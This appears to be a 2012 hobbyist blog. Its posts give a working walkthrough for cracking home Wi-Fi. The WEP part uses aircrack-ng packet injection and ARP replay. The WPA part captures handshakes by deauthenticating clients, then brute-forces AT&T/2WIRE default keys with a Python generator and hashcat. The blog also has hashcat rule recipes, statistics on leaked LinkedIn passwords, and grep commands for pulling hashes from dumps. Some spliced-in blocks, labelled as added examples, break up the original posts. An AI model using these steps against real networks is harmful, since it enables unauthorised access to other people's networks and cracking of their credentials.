UPDATE: Cracking 2WIRE WPA1/2

Tuesday, October 23, 2012 Posted by Unknown 0 comments

My previous post had a few problems with the script. I then updated the script to work properly: http://pastie.org/5101804 However, it was still way too slow. I asked around and found the following solution.

http://pastie.org/5104479



#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any number that repeats a digit three or more times in a row, like 333

import sys
from threading import Thread

def count1(first, ver):
    # Every 9-digit suffix from 999000000 upward starts with "999" and would be
    # skipped anyway, so the loop can stop early.
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        # Check the full 10-digit key so a triple that spans the leading digit
        # (e.g. 7 followed by 77...) is skipped as well
        key = str(first) + int_string
        if any(pattern in key for pattern in BAD_PATTERNS):
            continue
        print ( key )

if __name__ == '__main__':
    # One thread per leading digit; each thread counts through the other nine digits
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
        except Exception as errtxt:
            print ( errtxt )


Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.

My Method for cracking WEP

Friday, October 19, 2012 Posted by Unknown 0 comments

There are hundreds if not thousands of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP themselves.

Aircrack-ng's guide to cracking WEP

Download and boot off of BackTrack 5 R3. To install it on a flash drive, use the Linux/Windows tool YUMI.

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

You should see several APs. Record the BSSID, ESSID, and channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, you need to close airodump and stop airmon.

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (With WEP it's not as necessary to lock the channel in on the driver as it is with WPA.)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>


Now you need to inject packets. This will send packets to the access point as the other associated client, generating the golden IVs you need to crack the WEP.

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

If the above isn't generating any IVs you might need to tweak your command line. 

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 



Success looks like: (Stole this output from http://www.aircrack-ng.org)
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.
Here is an example of what a failed authentication looks like:
18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also do an ARP request replay attack, either at the same time or in lieu of the above attack.

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>


Here is what the screen looks like when ARP requests are being injected:
 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the IVs you have obtained. There are a lot of different options at this point. For example, the AT&T U-verse default WEP key is numbers only, and the Verizon FIOS default is 0-9A-F. Doing your homework on the default SSID might lead to a quicker crack.


Static WEP cracking options:
-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.


#aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select the network you want to crack and show how many IVs it currently has.

I only use the -f 1 option to get keys that are too easy and are thought to be false positives, i.e. 123456789 or 111111111.

And remember, a few quick Google searches on the SSID (if it's a default SSID) can save you a lot of time.

Side note: if you run:

#iwconfig wlan0

and the transmit power isn't set correctly for your gear, you can change it with:

#iwconfig wlan0 txpower <dBm>


This is not a complete guide of everything you can do. It's just what I do, and it has a high success rate. If you have any questions feel free to drop me an e-mail/Gtalk at init6@init6.me


Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012 Posted by Unknown 0 comments

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you get the four way handshake from part 1.

My python script can be found here. It creates a CPU pool based on how many cores you have. Based on python 2.7.3 and Linux OS.

What the script does is count from 000000000 to 9999999999, skipping any number that has three repeating digits in a row, so you won't get keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers too random, cutting their key space down. It's faster to count through and skip past repeating numbers than to process each number.
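To put a number on the "cutting their key space down" remark, here is an added example (not from the original post or its script) that counts how many 10-digit keys survive the no-three-in-a-row rule with a small dynamic programme, cross-checked against brute-force enumeration for short lengths.

```python
from math import log2

DIGITS = "0123456789"

def no_triple_count(n, base=10):
    """Number of length-n strings over `base` symbols with no run of 3 equal symbols.
    Dynamic programme: end1/end2 = strings whose final run has length 1 or 2."""
    if n <= 0:
        return 1
    end1, end2 = base, 0            # every length-1 string ends in a run of 1
    for _ in range(n - 1):
        # appending a different symbol starts a new run of length 1;
        # repeating the last symbol once more turns a run of 1 into a run of 2
        end1, end2 = (base - 1) * (end1 + end2), end1
    return end1 + end2

def brute_count(n):
    """Same count by enumeration, for cross-checking small n (same filter as the script)."""
    bad = {d * 3 for d in DIGITS}
    return sum(1 for i in range(10 ** n)
               if not any(p in str(i).zfill(n) for p in bad))

def keyspace_report(n=10):
    """Candidates left after the filter, how many were skipped, and the effective bits."""
    total = 10 ** n
    kept = no_triple_count(n)
    return {
        "candidates": kept,
        "skipped": total - kept,
        "fraction_kept": kept / total,
        "bits": log2(kept),
    }

if __name__ == "__main__":
    r = keyspace_report(10)
    print(f"{r['candidates']:,} of {10 ** 10:,} ten-digit keys survive the filter "
          f"({r['fraction_kept']:.1%}, about {r['bits']:.1f} bits)")
```

For the full 10-digit space the filter keeps 9,282,568,410 keys (92.8%, about 33.1 bits), so it mainly saves iteration work rather than removing much entropy.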

To change where the program starts, open it and change the following line to whatever you want:

start = str(7)

To run the program pipe it to hashcat-plus.

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With AMD driver 12.8 and SDK 2.7 I get about 86K keys per second. With the built-in brute force I get 114K keys per second. Still working on how to improve my output speed.

To get more info on hashcat look here.

Straight brute force on a known key starting with 7 saved over an hour.

Screenshots: with script / without script


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate. using http://hashcat.net/wiki/doku.php?id=statsprocessor making a hcstat file. Utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 

PART 1: Cracking AT&T WPA1/2

Posted by Unknown 0 comments
Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several APs. Record the BSSID and channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, you need to close airodump and stop airmon.

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

The channel number needs to be the same as your target's so you can get the full four-way handshake between the client and the AP. Airodump should show the handshake in the top right-hand corner once you get one.

Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • mon0 is the interface name

If you are using BackTrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit, or you can load up Wireshark and run a filter for EAPOL, which I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you whether you have a good EAPOL handshake, a workable one, or nothing at all if none are found.

To strip everything out of your pcap file except your handshakes, run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it yourself. I just use their site.



Hashcat Rules

Sunday, August 12, 2012 Posted by Unknown 0 comments
Link to information about Hashcat rule based attack.

Besides the out-of-the-box rules and some of the amazing rules atom and his team come up with, I will be updating this post from time to time, adding new rules I come up with or that others give me the idea for.

malik51 and I were talking. I was trying to get ?d?s prepended and appended to a password, as running two rules, one appending and one prepending, is slow and doesn't work. After much frustration I had one good idea, which I will share below. His solution:

./mp64.bin -1 ?d?s '$?1 $?1 Y2 }}' -o malik51roll2.rule
./mp64.bin -1 ?d?s '$?1 $?1 $?1 Y3 }}}' -o malik51roll3.rule

This will add the same to both sides: !@pass!@ or 123pass123. Works great, and it's fast.

However, I wanted more. I wanted passwords like 1@pass$% or 123pass#$%. What I thought was the solution to the above actually works for this. It first reverses the password (ssap), then appends the digit or special character (ssap@1), then reverses the word again (1@pass), and finally appends the next set to give you 1@pass$%.

./mp64.bin -1 ?d?s 'r $?1 $?1 r $?1 $?1' -o init6reverse.rule

However, this only works for two spots. You can't do 123pass#$%; it's just too big.

In the spirit of the malik51roll2.rule I made the ldsUroll.rule:
./mp64.bin -1 ?l?d?s?u '$?1 $?1 Y2 }}' -o ldsUroll.rule
It appends and prepends lowercase, digits, special, and uppercase.
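As an added example (not from the original post or from hashcat), here is a small interpreter for the rule functions used above (`:`, `$X`, `^X`, `r`, `YN`, `}`, `{`), so a rule can be traced on one word before generating a whole rule file with mp64; it assumes the ?1 placeholders have already been expanded to concrete characters.

```python
def tokenize(rule):
    """Split a rule line into function tokens. '$', '^' and 'Y' take the next
    character as their argument even when it is a space (e.g. '$ ' appends a space)."""
    tokens, i = [], 0
    while i < len(rule):
        ch = rule[i]
        if ch == " ":               # separator between functions
            i += 1
            continue
        if ch in "$^Y":
            if i + 1 >= len(rule):
                raise ValueError(f"missing argument for {ch!r}")
            tokens.append(rule[i:i + 2])
            i += 2
        else:
            tokens.append(ch)
            i += 1
    return tokens

def apply_rule(word, rule):
    """Apply each function of `rule` to `word` in order and return the candidate."""
    for tok in tokenize(rule):
        fn, arg = tok[0], tok[1:]
        if fn == ":":               # no-op
            continue
        elif fn == "$":             # append character
            word = word + arg
        elif fn == "^":             # prepend character
            word = arg + word
        elif fn == "r":             # reverse
            word = word[::-1]
        elif fn == "Y":             # duplicate last N characters (N is 0-9 or A-Z)
            n = int(arg, 36)
            word = word + word[-n:] if n else word
        elif fn == "}":             # rotate right: last character moves to the front
            word = word[-1:] + word[:-1]
        elif fn == "{":             # rotate left: first character moves to the end
            word = word[1:] + word[:1]
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return word

if __name__ == "__main__":
    # The two rules from the post, with ?1 expanded to concrete characters
    print(apply_rule("pass", "$! $@ Y2 } }"))        # !@pass!@
    print(apply_rule("pass", "r $@ $1 r $$ $%"))     # 1@pass$%
```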


EDIT: 8/12/2012 4:13AM

The following haven't found that many, but they found some.


bible verse numbers:

./mp64.bin -1 123456 -2 12 '$: $?d $?d' -o biblenum1.rule
./mp64.bin -1 123456 -2 12 '$: $1 $?d $?d' -o biblenum2.rule
./mp64.bin -1 123456 -2 12 '$  $: $?d $?d' -o biblenum1a.rule
./mp64.bin -1 123456 -2 12 '$  $: $1 $?d $?d' -o biblenum2a.rule
./mp64.bin -1 123456 -2 12 '$?d $: $?d $?d' -o biblenum3.rule
./mp64.bin -1 123456 -2 12 '$?d $: $1 $?d $?d' -o biblenum4.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $?d $?d $?d' -o biblenum5.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $1 $?d $?d $?d' -o biblenum6.rule
./mp64.bin -1 123456 -2 12 '$1 $5 $0 $: $?2 $?d $?d $?d' -o biblenum7.rule

biblenum* >> bible.rule



append : 1-3 everything

./mp64.bin -1 ?d?s?l?u '$: $?1' -o append1.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1' -o append2.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1 $?1' -o append3.rule

append* >> append.rule



Append clock both 12 and 24 hour

./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d' -o clock.rule

#haven't tried this, most likely too large.
./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d $: $?d $?d' -o clockSeconds.rule




Linkedin Passwords Analysed

Thursday, August 9, 2012 Posted by Unknown 0 comments
Number of Linkedin passwords analysed: 4,769,941

Passpal.rb output. See the full report here. 

I also ran some other reports. Just the masked hashes that were zeroed out for the first 5 bytes can be found here.
Just the normal hashes that didn't have the zeroed out bytes report can be found here. 


Base word (len>=3) frequency, sorted by count, top 20
+-----------------------------+
|   Word   | Count | Of total |
+-----------------------------+
| linkedin |  3674 | 0.077 %  |
| link     |  2282 | 0.0478 % |
| linked   |  1905 | 0.0399 % |
| alex     |  1089 | 0.0228 % |
| mike     |  1075 | 0.0225 % |
| may      |  1032 | 0.0216 % |
| love     |   967 | 0.0203 % |
| Linkedin |   865 | 0.0181 % |
| june     |   860 | 0.018 %  |
| john     |   852 | 0.0179 % |
| blue     |   788 | 0.0165 % |
| jan      |   765 | 0.016 %  |
| jack     |   746 | 0.0156 % |
| july     |   709 | 0.0149 % |
| password |   701 | 0.0147 % |
| sam      |   695 | 0.0146 % |
| pass     |   693 | 0.0145 % |
| chris    |   663 | 0.0139 % |
| mark     |   628 | 0.0132 % |
| dec      |   624 | 0.0131 % |
+-----------------------------+

Length frequency, sorted by length, full table
+------------------------------+
| Length |  Count  | Of total  |
+------------------------------+
|      1 |      28 | 0.0006 %  |
|      2 |      25 | 0.0005 %  |
|      3 |      23 | 0.0005 %  |
|      4 |       5 | 0.0001 %  |
|      5 |       2 | 0.0 %     |
|      6 |  578859 | 12.1354 % |
|      7 |  596636 | 12.5081 % |
|      8 | 1567986 | 32.8718 % |
|      9 |  822634 | 17.246 %  |
|     10 |  567261 | 11.8923 % |
|     11 |  290798 | 6.0964 %  |
|     12 |  174207 | 3.6521 %  |
|     13 |   87247 | 1.8291 %  |
|     14 |   49301 | 1.0336 %  |
|     15 |   23493 | 0.4925 %  |
|     16 |    9970 | 0.209 %   |
|     17 |     801 | 0.0168 %  |
|     18 |     383 | 0.008 %   |
|     19 |     161 | 0.0034 %  |
|     20 |      81 | 0.0017 %  |
+------------------------------+


Charset frequency, sorted by count, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+

Charset frequency, sorted by count/keyspace, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+


Total characters: 40923061
Unique characters: 343
Top 50 characters: ae1inrosl02tmd3cuhk947b85gp6yjfvwzxASML!BR@CTEDNPI

Character frequency, sorted by count, top 20
+--------------------------------+
| Character |  Count  | Of total |
+--------------------------------+
| a         | 3018713 | 7.3766 % |
| e         | 2503293 | 6.1171 % |
| 1         | 2021211 | 4.9391 % |
| i         | 2015863 | 4.926 %  |
| n         | 1894225 | 4.6287 % |
| r         | 1760160 | 4.3011 % |
| o         | 1723761 | 4.2122 % |

Symbol frequency, sorted by count, top 20
+-----------------+
| Symbol | Count  |
+-----------------+
| !      | 111239 |
| @      | 100945 |
| #      |  44236 |
| .      |  43380 |
| *      |  40449 |
| _      |  32678 |
| -      |  29112 |
| &      |  14655 |










Finding Hashes

Monday, July 23, 2012 Posted by Unknown 0 comments


To search for SHA1 in file:
cat FILE | grep -o -E -e "[0-9a-f]{40}" | sort | uniq -u > all-SHA1

To search for SHA-256 in file:
cat FILE | grep -o -E -e "[0-9a-f]{64}" | sort | uniq -u > all-SHA256

To search for SHA-512 in file:
cat FILE | grep -o -E -e "[0-9a-f]{128}" | sort | uniq -u > all-SHA512

To search for MD5 in file:
cat FILE | grep -o -E -e "[0-9a-f]{32}" | sort | uniq -u > all-md5

To search for MD5crypt in file:
cat FILE | grep '^\$1\$' | cut -d: -f2- | sort | uniq -u > all-md5crypt

To search for NTLM in file:
cat FILE | grep -o -E -e ':\$NT\$[[:alnum:]]{32}:' | sort | uniq -u > all-NTLM
cat FILE | grep -o -E -e ':\$NT\$[[:alnum:]]{30,34}:' | sort | uniq -u > all-NTLM
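As an added example (not from the original post), here is a Python equivalent of the searches above that classifies each token by format; its bare-hex patterns are anchored on both sides so a 64-hex SHA-256 is not also reported as a 40-hex SHA-1, which an unanchored `grep -o "[0-9a-f]{40}"` would do.

```python
import hashlib
import re
from collections import defaultdict

# Prefixed formats first; bare hex runs are anchored so that a longer digest
# is never also reported as one of the shorter formats.
HASH_RE = re.compile(
    r"(?P<md5crypt>\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22})"
    r"|(?P<ntlm>\$NT\$[0-9a-fA-F]{32})"          # pwdump-style $NT$ prefix, 32 hex
    r"|(?<![0-9a-fA-F])(?:"
    r"(?P<sha512>[0-9a-fA-F]{128})"
    r"|(?P<sha256>[0-9a-fA-F]{64})"
    r"|(?P<sha1>[0-9a-fA-F]{40})"
    r"|(?P<md5>[0-9a-fA-F]{32})"
    r")(?![0-9a-fA-F])"
)

def find_hashes(text):
    """Map format name -> sorted distinct tokens (one copy of each)."""
    found = defaultdict(set)
    for m in HASH_RE.finditer(text):
        found[m.lastgroup].add(m.group(m.lastgroup))
    return {name: sorted(vals) for name, vals in found.items()}

# Constructed sample dump: digests of a throwaway string plus two made-up
# crypt-style entries. None of these are real credentials.
SAMPLE_MD5 = hashlib.md5(b"example").hexdigest()
SAMPLE_SHA1 = hashlib.sha1(b"example").hexdigest()
SAMPLE_SHA256 = hashlib.sha256(b"example").hexdigest()
SAMPLE_SHA512 = hashlib.sha512(b"example").hexdigest()
SAMPLE_MD5CRYPT = "$1$saltsalt$abcdefghijklmnopqrstuv"   # made-up salt and hash
SAMPLE_NTLM = "$NT$" + SAMPLE_MD5[::-1]                   # made-up 32-hex value
SAMPLE = "\n".join([
    "alice:" + SAMPLE_MD5,
    "bob:" + SAMPLE_SHA1,
    "bob:" + SAMPLE_SHA1,            # duplicate line, reported once
    "carol:" + SAMPLE_SHA256,
    "dave:" + SAMPLE_SHA512,
    "erin:" + SAMPLE_MD5CRYPT,
    "frank:" + SAMPLE_NTLM + ":",
])

if __name__ == "__main__":
    for name, values in sorted(find_hashes(SAMPLE).items()):
        print(f"{name:9} {len(values)} token(s), e.g. {values[0][:16]}...")
```

Note that `uniq -u` in the pipelines above keeps only tokens that occur exactly once in the file; plain `uniq` (or `sort -u`) keeps one copy of every token, which is what find_hashes does.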